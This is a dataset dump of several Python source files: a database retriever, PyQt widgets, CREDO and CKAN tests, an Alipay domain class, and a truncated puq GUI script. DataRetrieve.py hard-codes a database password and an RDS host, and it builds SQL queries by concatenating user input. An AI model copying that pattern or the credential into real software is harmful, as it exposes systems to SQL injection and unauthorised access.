code
stringlengths
2k
1.04M
repo_path
stringlengths
5
517
parsed_code
stringlengths
0
1.04M
quality_prob
float64
0.02
0.95
learning_prob
float64
0.02
0.93
import pandas as pd from sqlalchemy import create_engine class DataRetriever: def retrieveAllData(): global fof_data global monthly #balance sheet global annually #balance sheet fof_data = DataRetriever.retrieve("records") monthly = DataRetriever.retrieve("monthly") annually = DataRetriever.retrieve("annually") def openConnection(): sqlEngine = create_engine('postgresql+psycopg2://postgres:CT1SEr.FtW@database-1.cczlh6s4kbhf.us-east-1.rds.amazonaws.com/data') dbConnection = sqlEngine.connect() return dbConnection def retrieve(table_name): print(table_name) dbConnection = DataRetriever.openConnection() global all_data all_data = pd.read_sql_table(table_name, dbConnection) print(all_data) dbConnection.close() return all_data def retrieveFofData(): return fof_data def retrieveMonthlyData(): return monthly def retrieveAnnuallyData(): return annually def pushToTable(userdata, username, datasource, requestType, usedGraphNames, description, graphName): dbConnection = DataRetriever.openConnection() description = description.replace("'", "''") if(requestType == "custom_request"): sqlStatement = "INSERT INTO user_custom_data(username, userdata, datasource) VALUES ('"+username+"', '"+ userdata +"' , '" + datasource +"');" elif(requestType == "important_request"): sqlStatement = "INSERT INTO important_graph_data(username, usedgraphnames, graphName, graphdatasource, description) VALUES ('"+username+"', '"+ usedGraphNames +"', '" + graphName +"', '"+ datasource +"', '"+ description+"');" print(sqlStatement) dbConnection.execute(sqlStatement) dbConnection.close() def pullFromTable(username, datasource, requestType): dbConnection = DataRetriever.openConnection() if(requestType == "custom_request"): sqlStatement = "SELECT userdata FROM user_custom_data WHERE username='" + username +"' AND datasource='"+datasource+"';" elif(requestType == "important_request"): sqlStatement = "SELECT usedgraphnames, graphname, description FROM important_graph_data WHERE username='" + username +"' AND 
graphdatasource='"+datasource+"';" print(sqlStatement) rs = dbConnection.execute(sqlStatement).fetchall() dbConnection.close() return rs
DataRetrieve.py
import pandas as pd from sqlalchemy import create_engine class DataRetriever: def retrieveAllData(): global fof_data global monthly #balance sheet global annually #balance sheet fof_data = DataRetriever.retrieve("records") monthly = DataRetriever.retrieve("monthly") annually = DataRetriever.retrieve("annually") def openConnection(): sqlEngine = create_engine('postgresql+psycopg2://postgres:CT1SEr.FtW@database-1.cczlh6s4kbhf.us-east-1.rds.amazonaws.com/data') dbConnection = sqlEngine.connect() return dbConnection def retrieve(table_name): print(table_name) dbConnection = DataRetriever.openConnection() global all_data all_data = pd.read_sql_table(table_name, dbConnection) print(all_data) dbConnection.close() return all_data def retrieveFofData(): return fof_data def retrieveMonthlyData(): return monthly def retrieveAnnuallyData(): return annually def pushToTable(userdata, username, datasource, requestType, usedGraphNames, description, graphName): dbConnection = DataRetriever.openConnection() description = description.replace("'", "''") if(requestType == "custom_request"): sqlStatement = "INSERT INTO user_custom_data(username, userdata, datasource) VALUES ('"+username+"', '"+ userdata +"' , '" + datasource +"');" elif(requestType == "important_request"): sqlStatement = "INSERT INTO important_graph_data(username, usedgraphnames, graphName, graphdatasource, description) VALUES ('"+username+"', '"+ usedGraphNames +"', '" + graphName +"', '"+ datasource +"', '"+ description+"');" print(sqlStatement) dbConnection.execute(sqlStatement) dbConnection.close() def pullFromTable(username, datasource, requestType): dbConnection = DataRetriever.openConnection() if(requestType == "custom_request"): sqlStatement = "SELECT userdata FROM user_custom_data WHERE username='" + username +"' AND datasource='"+datasource+"';" elif(requestType == "important_request"): sqlStatement = "SELECT usedgraphnames, graphname, description FROM important_graph_data WHERE username='" + username +"' AND 
graphdatasource='"+datasource+"';" print(sqlStatement) rs = dbConnection.execute(sqlStatement).fetchall() dbConnection.close() return rs
0.190988
0.183557
import os from typing import Dict, List, Optional, Tuple, Union from urllib.request import pathname2url import webbrowser from PyQt5.QtWidgets import QFileDialog, QTableWidgetItem, QWidget _TypeList = Optional[ Union[ List[Tuple[str, str]], Dict[str, str], List[str] ] ] class SortableTableWidgetItem(QTableWidgetItem): """ A :class:`QTableWidgetItem` which supports numerical sorting. .. automethod:: __init__ .. automethod:: __lt__ """ def __init__(self, text: str) -> None: """ Create a new sortable table widget item. :param str text: contents of the item :return: nothing :rtype: None """ super().__init__(text) def __lt__(self, other: "SortableTableWidgetItem") -> bool: """ Compare two items. :param SortableTableWidgetItem other: item to which self is compared :return: True if self is less than other :rtype: bool """ key1 = self.text() key2 = other.text() try: return float(key1) < float(key2) except ValueError: return key1 < key2 class FileTypes: """ A class for managing file types in :class:`~PyQt5.QtWidgets.QFileDialog` . :cvar dict _default_file_types: default file types :ivar list types: actually used file types :ivar list filters: filter strings .. automethod:: __init__ """ _default_file_types = { "xls": ("xls", "Excel 97-2003"), "xlsx": ("xlsx", "Excel"), "csv": ("csv", "Comma-separated value"), "png": ("png", "Portable network graphics"), "svg": ("svg", "Scalable vector graphics"), "gv": ("gv", "GraphViz DOT"), "gexf": ("gexf", "Graph exchange XML format"), "": ("", "all files") } def __init__(self, type_list: _TypeList=None) -> None: """ Create a new :class:`FileTypes` object. 
:param type_list: list of (extension, description) tuples or {ext: description} dict or list of extensions, which are then filtered from ``_default_file_types`` :type type_list: list(tuple(str, str)) or dict or list(str) :return: nothing :rtype: None :raise TypeError: if an invalid type was specified for ``ext_list`` """ if type_list is None: self.types = self._default_file_types return self.types = [] try: # dict for ext, description in sorted(type_list.items()): self.types.append((ext, description)) except AttributeError: try: # list of tuples for ext, description in type_list: self.types.append((ext, description)) except (TypeError, ValueError): self.types = [] try: # list of strings for ext in type_list: try: self.types.append(self._default_file_types[ext]) except KeyError: pass except (TypeError, ValueError): raise TypeError("Argument for 'ext_list' has wrong type") self.filters = ["{1} [{0}] (*.{0})".format(k, v) for k, v in self.types] def get_filter(self) -> str: """ Returns a file filter suitable for the ``filter`` parameter of :class:`~PyQt5.QtWidgets.QFileDialog`. :return: a file filter :rtype: str """ return ";;".join(self.filters) def get_type(self, filefilter: str) -> Tuple[str, str]: """ Returns the extension and description associated with a file filter. :param str filefilter: filefilter as returned by the dialog :return: the extension and description of the file type :rtype: tuple(str, str) """ return self.types[self.filters.index(filefilter)] def get_filename(parent: QWidget, kind: str="save", caption: str="", directory: str="", file_types: Optional[FileTypes]=None) -> Tuple[Optional[str], str]: """ Get a filename by a :class:`QFileDialog` and automatically add extensions. 
:param QWidget parent: parent of the dialog :param str kind: ``"save"`` or ``"open"``, chooses the dialog type :param str caption: caption of the dialog :param str directory: initial directory :param FileTypes file_types: file extensions :return: the file name with extension and the last path :rtype: tuple(str, str) :raise ValueError: if an invalid value was supplied to ``kind`` """ if file_types is None: file_types = FileTypes() if kind == "save": dialog = QFileDialog.getSaveFileName elif kind == "open": dialog = QFileDialog.getOpenFileName else: raise ValueError("Unknown value for 'kind': " + kind) filename, used_filter = dialog( parent, caption, directory, file_types.get_filter()) new_path = os.path.split(filename)[0] if not filename: return None, new_path ext, _ = file_types.get_type(used_filter) if not filename.endswith(ext): filename += "." + ext return filename, new_path def open_manual() -> None: """ Open the manual in a browser. :return: nothing :rtype: None """ path = os.path.abspath( os.path.join("docs", "_build", "html", "index.html")) webbrowser.open("file:{}".format(pathname2url(path)))
widgets.py
import os from typing import Dict, List, Optional, Tuple, Union from urllib.request import pathname2url import webbrowser from PyQt5.QtWidgets import QFileDialog, QTableWidgetItem, QWidget _TypeList = Optional[ Union[ List[Tuple[str, str]], Dict[str, str], List[str] ] ] class SortableTableWidgetItem(QTableWidgetItem): """ A :class:`QTableWidgetItem` which supports numerical sorting. .. automethod:: __init__ .. automethod:: __lt__ """ def __init__(self, text: str) -> None: """ Create a new sortable table widget item. :param str text: contents of the item :return: nothing :rtype: None """ super().__init__(text) def __lt__(self, other: "SortableTableWidgetItem") -> bool: """ Compare two items. :param SortableTableWidgetItem other: item to which self is compared :return: True if self is less than other :rtype: bool """ key1 = self.text() key2 = other.text() try: return float(key1) < float(key2) except ValueError: return key1 < key2 class FileTypes: """ A class for managing file types in :class:`~PyQt5.QtWidgets.QFileDialog` . :cvar dict _default_file_types: default file types :ivar list types: actually used file types :ivar list filters: filter strings .. automethod:: __init__ """ _default_file_types = { "xls": ("xls", "Excel 97-2003"), "xlsx": ("xlsx", "Excel"), "csv": ("csv", "Comma-separated value"), "png": ("png", "Portable network graphics"), "svg": ("svg", "Scalable vector graphics"), "gv": ("gv", "GraphViz DOT"), "gexf": ("gexf", "Graph exchange XML format"), "": ("", "all files") } def __init__(self, type_list: _TypeList=None) -> None: """ Create a new :class:`FileTypes` object. 
:param type_list: list of (extension, description) tuples or {ext: description} dict or list of extensions, which are then filtered from ``_default_file_types`` :type type_list: list(tuple(str, str)) or dict or list(str) :return: nothing :rtype: None :raise TypeError: if an invalid type was specified for ``ext_list`` """ if type_list is None: self.types = self._default_file_types return self.types = [] try: # dict for ext, description in sorted(type_list.items()): self.types.append((ext, description)) except AttributeError: try: # list of tuples for ext, description in type_list: self.types.append((ext, description)) except (TypeError, ValueError): self.types = [] try: # list of strings for ext in type_list: try: self.types.append(self._default_file_types[ext]) except KeyError: pass except (TypeError, ValueError): raise TypeError("Argument for 'ext_list' has wrong type") self.filters = ["{1} [{0}] (*.{0})".format(k, v) for k, v in self.types] def get_filter(self) -> str: """ Returns a file filter suitable for the ``filter`` parameter of :class:`~PyQt5.QtWidgets.QFileDialog`. :return: a file filter :rtype: str """ return ";;".join(self.filters) def get_type(self, filefilter: str) -> Tuple[str, str]: """ Returns the extension and description associated with a file filter. :param str filefilter: filefilter as returned by the dialog :return: the extension and description of the file type :rtype: tuple(str, str) """ return self.types[self.filters.index(filefilter)] def get_filename(parent: QWidget, kind: str="save", caption: str="", directory: str="", file_types: Optional[FileTypes]=None) -> Tuple[Optional[str], str]: """ Get a filename by a :class:`QFileDialog` and automatically add extensions. 
:param QWidget parent: parent of the dialog :param str kind: ``"save"`` or ``"open"``, chooses the dialog type :param str caption: caption of the dialog :param str directory: initial directory :param FileTypes file_types: file extensions :return: the file name with extension and the last path :rtype: tuple(str, str) :raise ValueError: if an invalid value was supplied to ``kind`` """ if file_types is None: file_types = FileTypes() if kind == "save": dialog = QFileDialog.getSaveFileName elif kind == "open": dialog = QFileDialog.getOpenFileName else: raise ValueError("Unknown value for 'kind': " + kind) filename, used_filter = dialog( parent, caption, directory, file_types.get_filter()) new_path = os.path.split(filename)[0] if not filename: return None, new_path ext, _ = file_types.get_type(used_filter) if not filename.endswith(ext): filename += "." + ext return filename, new_path def open_manual() -> None: """ Open the manual in a browser. :return: nothing :rtype: None """ path = os.path.abspath( os.path.join("docs", "_build", "html", "index.html")) webbrowser.open("file:{}".format(pathname2url(path)))
0.808332
0.214034
from credoscript import adaptors, models from tests import CredoAdaptorTestCase class ContactAdaptorTestCase(CredoAdaptorTestCase): def setUp(self): self.adaptor = adaptors.ContactAdaptor() self.expected_entity = models.Contact def test_fetch_by_contact_id(self): """Fetch a single Contact by contact_id""" self.assertSingleResult('fetch_by_contact_id', 1, 1) def test_fetch_all_by_atom_id(self): """Fetch all contacts an atom has by atom_id""" self.assertPaginatedResult('fetch_all_by_atom_id', 1, 1) def test_fetch_all_by_residue_id(self): """Fetch all contacts a residue has by residue_id""" self.assertPaginatedResult('fetch_all_by_residue_id', 1, 1) def test_fetch_all_by_ligand_id(self): """Fetch all contacts a ligand has by ligand_id""" ligand = models.Ligand.query.filter_by(ligand_name='J07').first() self.assertPaginatedResult('fetch_all_by_ligand_id', ligand.ligand_id, ligand.biomolecule_id) def test_fetch_all_by_chain_id(self): """Fetch all contacts a chain has by chain_id""" chain = models.Chain.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_chain_id', chain.chain_id, chain.biomolecule_id) def test_fetch_all_by_interface_id(self): """Fetch all contacts a chain has by interface_id""" interface = models.Interface.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_interface_id', interface.interface_id, interface.biomolecule_id) def test_fetch_all_by_groove_id(self): """Fetch all contacts a groove has by groove_id""" groove = models.Groove.query.get(1) self.assertPaginatedResult('fetch_all_by_groove_id', groove.groove_id, groove.biomolecule_id) def test_fetch_all_by_ligand_fragment_id(self): """Fetch all contacts a ligand fragment has by ligand_fragment_id""" ligand = models.Ligand.query.filter_by(path='2ZJV/1/A/CT4`301').first() lf = ligand.LigandFragments[3] self.assertPaginatedResult('fetch_all_by_ligand_fragment_id', lf.ligand_fragment_id, ligand.ligand_id) def test_fetch_by_ligand_id_and_atom_names(self): """Fetch the SIFt with a 
ligand_id and atom names""" ligand = models.Ligand.query.filter_by(path='3EFW/1/A/AK8`404').first() result = self.adaptor.fetch_all_by_ligand_id_and_atom_names(ligand.ligand_id, ligand.biomolecule_id, [['C7', 'C6', 'C5', 'C9', 'N3', 'C8', 'C2', 'C3', 'C4', 'N2', 'C1', 'N1']])
tests/adaptors/contactadaptortestcase.py
from credoscript import adaptors, models from tests import CredoAdaptorTestCase class ContactAdaptorTestCase(CredoAdaptorTestCase): def setUp(self): self.adaptor = adaptors.ContactAdaptor() self.expected_entity = models.Contact def test_fetch_by_contact_id(self): """Fetch a single Contact by contact_id""" self.assertSingleResult('fetch_by_contact_id', 1, 1) def test_fetch_all_by_atom_id(self): """Fetch all contacts an atom has by atom_id""" self.assertPaginatedResult('fetch_all_by_atom_id', 1, 1) def test_fetch_all_by_residue_id(self): """Fetch all contacts a residue has by residue_id""" self.assertPaginatedResult('fetch_all_by_residue_id', 1, 1) def test_fetch_all_by_ligand_id(self): """Fetch all contacts a ligand has by ligand_id""" ligand = models.Ligand.query.filter_by(ligand_name='J07').first() self.assertPaginatedResult('fetch_all_by_ligand_id', ligand.ligand_id, ligand.biomolecule_id) def test_fetch_all_by_chain_id(self): """Fetch all contacts a chain has by chain_id""" chain = models.Chain.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_chain_id', chain.chain_id, chain.biomolecule_id) def test_fetch_all_by_interface_id(self): """Fetch all contacts a chain has by interface_id""" interface = models.Interface.query.limit(1).first() self.assertPaginatedResult('fetch_all_by_interface_id', interface.interface_id, interface.biomolecule_id) def test_fetch_all_by_groove_id(self): """Fetch all contacts a groove has by groove_id""" groove = models.Groove.query.get(1) self.assertPaginatedResult('fetch_all_by_groove_id', groove.groove_id, groove.biomolecule_id) def test_fetch_all_by_ligand_fragment_id(self): """Fetch all contacts a ligand fragment has by ligand_fragment_id""" ligand = models.Ligand.query.filter_by(path='2ZJV/1/A/CT4`301').first() lf = ligand.LigandFragments[3] self.assertPaginatedResult('fetch_all_by_ligand_fragment_id', lf.ligand_fragment_id, ligand.ligand_id) def test_fetch_by_ligand_id_and_atom_names(self): """Fetch the SIFt with a 
ligand_id and atom names""" ligand = models.Ligand.query.filter_by(path='3EFW/1/A/AK8`404').first() result = self.adaptor.fetch_all_by_ligand_id_and_atom_names(ligand.ligand_id, ligand.biomolecule_id, [['C7', 'C6', 'C5', 'C9', 'N3', 'C8', 'C2', 'C3', 'C4', 'N2', 'C1', 'N1']])
0.729423
0.451871
import mock import nose import ckan.new_tests.helpers as helpers import ckanext.datastore.db as db assert_equal = nose.tools.assert_equal class TestCreateIndexes(object): def test_creates_fts_index_by_default(self): connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('_full_text', connection, resource_id) @helpers.change_config('ckan.datastore.default_fts_lang', None) @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_with_english_as_default(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'english') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_with_config_var(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'simple') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_using_lang_param(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 
'resource_id': resource_id, 'lang': 'french', } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'french') def _assert_created_index_on(self, field, connection, resource_id, lang=None): if lang is not None: sql_str = u'ON "resource_id" USING gist(to_tsvector(\'{lang}\', \'{field}\'))' sql_str = sql_str.format(lang=lang, field=field) else: sql_str = u'USING gist({field})'.format(field=field) calls = connection.execute.call_args_list was_called = [call for call in calls if call[0][0].find(sql_str) != -1] assert was_called, ("Expected 'connection.execute' to have been ", "called with a string containing '%s'" % sql_str)
ckanext/datastore/tests/test_db.py
import mock import nose import ckan.new_tests.helpers as helpers import ckanext.datastore.db as db assert_equal = nose.tools.assert_equal class TestCreateIndexes(object): def test_creates_fts_index_by_default(self): connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('_full_text', connection, resource_id) @helpers.change_config('ckan.datastore.default_fts_lang', None) @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_with_english_as_default(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'english') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_with_config_var(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 'resource_id': resource_id, } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'simple') @helpers.change_config('ckan.datastore.default_fts_lang', 'simple') @mock.patch('ckanext.datastore.db._get_fields') def test_creates_fts_index_on_textual_fields_can_overwrite_lang_using_lang_param(self, _get_fields): _get_fields.return_value = [ {'id': 'foo', 'type': 'text'}, {'id': 'bar', 'type': 'number'} ] connection = mock.MagicMock() context = { 'connection': connection } resource_id = 'resource_id' data_dict = { 
'resource_id': resource_id, 'lang': 'french', } db.create_indexes(context, data_dict) self._assert_created_index_on('foo', connection, resource_id, 'french') def _assert_created_index_on(self, field, connection, resource_id, lang=None): if lang is not None: sql_str = u'ON "resource_id" USING gist(to_tsvector(\'{lang}\', \'{field}\'))' sql_str = sql_str.format(lang=lang, field=field) else: sql_str = u'USING gist({field})'.format(field=field) calls = connection.execute.call_args_list was_called = [call for call in calls if call[0][0].find(sql_str) != -1] assert was_called, ("Expected 'connection.execute' to have been ", "called with a string containing '%s'" % sql_str)
0.593491
0.227491
import json from alipay.aop.api.constant.ParamConstants import * class AccessProduceQrcode(object): def __init__(self): self._batch_id = None self._core_url = None self._produce_order_id = None self._qrcode = None @property def batch_id(self): return self._batch_id @batch_id.setter def batch_id(self, value): self._batch_id = value @property def core_url(self): return self._core_url @core_url.setter def core_url(self, value): self._core_url = value @property def produce_order_id(self): return self._produce_order_id @produce_order_id.setter def produce_order_id(self, value): self._produce_order_id = value @property def qrcode(self): return self._qrcode @qrcode.setter def qrcode(self, value): self._qrcode = value def to_alipay_dict(self): params = dict() if self.batch_id: if hasattr(self.batch_id, 'to_alipay_dict'): params['batch_id'] = self.batch_id.to_alipay_dict() else: params['batch_id'] = self.batch_id if self.core_url: if hasattr(self.core_url, 'to_alipay_dict'): params['core_url'] = self.core_url.to_alipay_dict() else: params['core_url'] = self.core_url if self.produce_order_id: if hasattr(self.produce_order_id, 'to_alipay_dict'): params['produce_order_id'] = self.produce_order_id.to_alipay_dict() else: params['produce_order_id'] = self.produce_order_id if self.qrcode: if hasattr(self.qrcode, 'to_alipay_dict'): params['qrcode'] = self.qrcode.to_alipay_dict() else: params['qrcode'] = self.qrcode return params @staticmethod def from_alipay_dict(d): if not d: return None o = AccessProduceQrcode() if 'batch_id' in d: o.batch_id = d['batch_id'] if 'core_url' in d: o.core_url = d['core_url'] if 'produce_order_id' in d: o.produce_order_id = d['produce_order_id'] if 'qrcode' in d: o.qrcode = d['qrcode'] return o
alipay/aop/api/domain/AccessProduceQrcode.py
import json from alipay.aop.api.constant.ParamConstants import * class AccessProduceQrcode(object): def __init__(self): self._batch_id = None self._core_url = None self._produce_order_id = None self._qrcode = None @property def batch_id(self): return self._batch_id @batch_id.setter def batch_id(self, value): self._batch_id = value @property def core_url(self): return self._core_url @core_url.setter def core_url(self, value): self._core_url = value @property def produce_order_id(self): return self._produce_order_id @produce_order_id.setter def produce_order_id(self, value): self._produce_order_id = value @property def qrcode(self): return self._qrcode @qrcode.setter def qrcode(self, value): self._qrcode = value def to_alipay_dict(self): params = dict() if self.batch_id: if hasattr(self.batch_id, 'to_alipay_dict'): params['batch_id'] = self.batch_id.to_alipay_dict() else: params['batch_id'] = self.batch_id if self.core_url: if hasattr(self.core_url, 'to_alipay_dict'): params['core_url'] = self.core_url.to_alipay_dict() else: params['core_url'] = self.core_url if self.produce_order_id: if hasattr(self.produce_order_id, 'to_alipay_dict'): params['produce_order_id'] = self.produce_order_id.to_alipay_dict() else: params['produce_order_id'] = self.produce_order_id if self.qrcode: if hasattr(self.qrcode, 'to_alipay_dict'): params['qrcode'] = self.qrcode.to_alipay_dict() else: params['qrcode'] = self.qrcode return params @staticmethod def from_alipay_dict(d): if not d: return None o = AccessProduceQrcode() if 'batch_id' in d: o.batch_id = d['batch_id'] if 'core_url' in d: o.core_url = d['core_url'] if 'produce_order_id' in d: o.produce_order_id = d['produce_order_id'] if 'qrcode' in d: o.qrcode = d['qrcode'] return o
0.540681
0.075687
import matplotlib matplotlib.use('TkAgg', warn=False) import scipy import numpy as np from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from matplotlib.figure import Figure from mpl_toolkits.mplot3d import Axes3D from matplotlib import cm import matplotlib.pyplot as plt from Tkinter import * from tkFont import Font import ttk import ScrolledText import sys, os, weakref, copy from urlparse import urlparse, urlunsplit import h5py from puq import Parameter, PDF, ExperimentalPDF, options, pickle, unpickle, NetObj, gaussian_kde, SampledFunc import math import webbrowser, shutil, atexit, shelve import logging from logging import info, debug, exception, warning, critical from optparse import OptionParser from cnote import CNote, sq_colors, sq_image from tooltip import ToolTip class MyCombobox: def __init__(self, parent, txt, values, current, callback=None): self.var = StringVar() self.var.set(current) self.callback = callback self.cb = ttk.Combobox(parent, textvariable=self.var, values=values) self.cb.bind('<<ComboboxSelected>>', self.changed) self.cb.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self, event): #print "combobox changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) def state(self, st, path): self.cb.config(state=st) class MyLabel: def __init__(self, parent, text, value, bg=''): self.frame = Frame(parent, background='black', bd=1) if bg: self.label = Label(self.frame, text=value, bg=bg) else: self.label = Label(self.frame, text=value) self.desc = Label(self.frame, text=text) self.desc.pack(side=LEFT, anchor='w') self.label.pack(side=LEFT, anchor='w') def update(self, val): self.label.config(text=val) # radiobutton class RB: RB_list= [] def __init__(self, parent, values, val, callback=None): self.callback = callback RB.RB_list.append(weakref.proxy(self)) self.var = StringVar() self.var.set(val) for txt in values: b = Radiobutton(parent, text=txt, variable=self.var, value=txt, command=self.changed) 
b.pack(side=TOP, padx=5, pady=5, anchor='w') def changed(self): #print "RB changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) @staticmethod def get(name): for n in RB.RB_list: if name == n.txt: return n.var.get() class MyEntry: def __init__(self, parent, txt, var, val, callback=None): self.callback = callback self.var = var self.var.set(val) Label(parent, text=txt).pack(side=LEFT) self.entry = Entry(parent, textvariable=self.var, width=10) self.entry.bind('<Return>', self.changed) self.entry.pack(side=LEFT, padx=5, anchor='w') def changed(self, entry): #print "Entry changed to %s" % (self.var.get()) if self.callback: self.callback(self.var.get()) else: MyApp.state_changed() def state(self, st): self.cb.config(state=st) def update(self, val): self.var.set(val) class MB: def __init__(self, parent, plotframe, dframe): menubar = Menu(parent) parent['menu'] = menubar filemenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="File", menu=filemenu) #filemenu.add_command(label="Upload", command=ask_upload) #filemenu.add_separator() #filemenu.add_command(label="Preferences", command=preferences) #filemenu.add_separator() filemenu.add_command(label="Quit", command=root.quit) self.exportmenu = Menu(menubar, tearoff=0) menubar.add_cascade(label="Export", menu=self.exportmenu) if dframe == None: self.exportmenu.add_command(label="Copy PDF to Clipboard", state=DISABLED) self.exportmenu.add_command(label="Export PDF as JSON", state=DISABLED) self.exportmenu.add_command(label="Export PDF to CSV file", state=DISABLED) else: self.exportmenu.add_command(label="Copy PDF to Clipboard", command=dframe.copy_clip, state=NORMAL) self.exportmenu.add_command(label="Export PDF as JSON", command=lambda: dframe.export_pdf('json'), state=NORMAL) self.exportmenu.add_command(label="Export PDF to CSV file", command=lambda: dframe.export_pdf('csv'), state=NORMAL) self.exportplot = 
Menu(self.exportmenu, tearoff=0) self.exportmenu.add_cascade(label="Plot to", menu=self.exportplot) fig = plt.figure() sup = fig.canvas.get_supported_filetypes() keys = sup.keys() keys.sort() for key in keys: lab = '%s : %s' % (key.upper(), sup[key]) self.exportplot.add_command(label=lab, command = lambda key=key: plotframe.plot(key)) helpmenu = Menu(menubar, tearoff=0) helpmenu.add_command(label="About", command=self.about) helpmenu.add_command(label="Online Help", command=self.open_help) menubar.add_cascade(label="Help", menu=helpmenu) parent.config(menu=menubar) def open_help(self): webbrowser.open('http://memshub.org/site/memosa_docs/puq/index.html') def about(self): from tkMessageBox import showinfo showinfo(message=__doc__, title='ABOUT') class ResponseFrame: def __init__(self, parent): self.tframe = Frame(parent) ResponseFrame.me = weakref.proxy(self) def cleanup(self): try: self.tframe.pack_forget() self.canvas._tkcanvas.pack_forget() del self.canvas del self.f except: pass def plot(self, ext): from tkFileDialog import asksaveasfilename filename = asksaveasfilename(title="Plot to file...", initialfile='%s-response' % self.name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def state(self, st, val, path): self.cleanup() if st != 'RESPONSE': return self.name = os.path.basename(path[:-9]) self.f = plt.figure(figsize=(5, 5)) self.canvas = FigureCanvasTkAgg(self.f, master=self.tframe) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.tframe.pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) if len(val.params) > 2: ax = Axes3D(self.f, azim=30.0, elev=30.0) ax.text2D(0.5, 0.5,'Cannot plot response functions\nwith more than 2 parameters', horizontalalignment='center', verticalalignment='center', transform = ax.transAxes) elif len(val.params) == 2: labels = CB.get('Labels') ax = Axes3D(self.f, azim=30.0, elev=30.0) 
val.plot(ax=ax, fig=self.f, title=0, labels=labels) else: self.a = self.f.add_subplot(111) self.a.grid(True) val.plot(fig=self.a) class PlotFrame: def __init__(self, parent): self.parent = parent # TOP FRAME - CANVAS self.f = plt.figure(figsize=(5, 5)) self.a = self.f.add_subplot(111) self.a.grid(True) #self.a.set_xlabel(self.description) self.a.set_ylabel("Probability") self.canvas = FigureCanvasTkAgg(self.f, master=parent) self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) self.canvas._tkcanvas.pack(side='top', fill='both', expand=1) def update(self): self.canvas.draw() def get_plot(self): return self.a def plot(self, ext): from tkFileDialog import asksaveasfilename name = 'puq-plot' filename = asksaveasfilename(title="Plot to file...", initialfile=name, defaultextension='.%s' % ext, filetypes=[(ext.upper(), '*.%s' % ext)]) if not filename: return self.canvas.print_figure(filename) def PdfFactory(frame, obj, plotframe, nb=None, color=None, desc=None): state = None if isinstance(obj, PDF): if hasattr(obj, 'data'): state = 'PDF' else: state = 'PDF2' elif isinstance(obj, Parameter): if hasattr(obj.pdf, 'data'): state = 'PDF' else: state = 'PDF2' if state == 'PDF': return PdfFrameComplex(frame, obj, plotframe, nb=nb, color=color, desc=desc) if state == 'PDF2': return PdfFrameSimple(frame, obj, plotframe, nb=nb, color=color, desc=desc) print 'FACTORY RETURNING NONE' return None class PdfFrame: def get_color(self, color): if color == None: color = 'blue' elif isinstance(color, int): color = sq_colors[color] return color def copy_clip(self): root.clipboard_clear() root.clipboard_append(pickle(self.pdf)) def export_pdf(self, ext): # Dump pdf as csv, json, or python import csv from tkFileDialog import asksaveasfilename if self.par: name = '%s-pdf' % self.par.name else: name = 'PDF' extension = '.'+ext filetypes = [(ext.upper(), '*.%s' % ext)] filename = asksaveasfilename(title="Save PDF to CSV file...", initialfile=name, defaultextension=extension, 
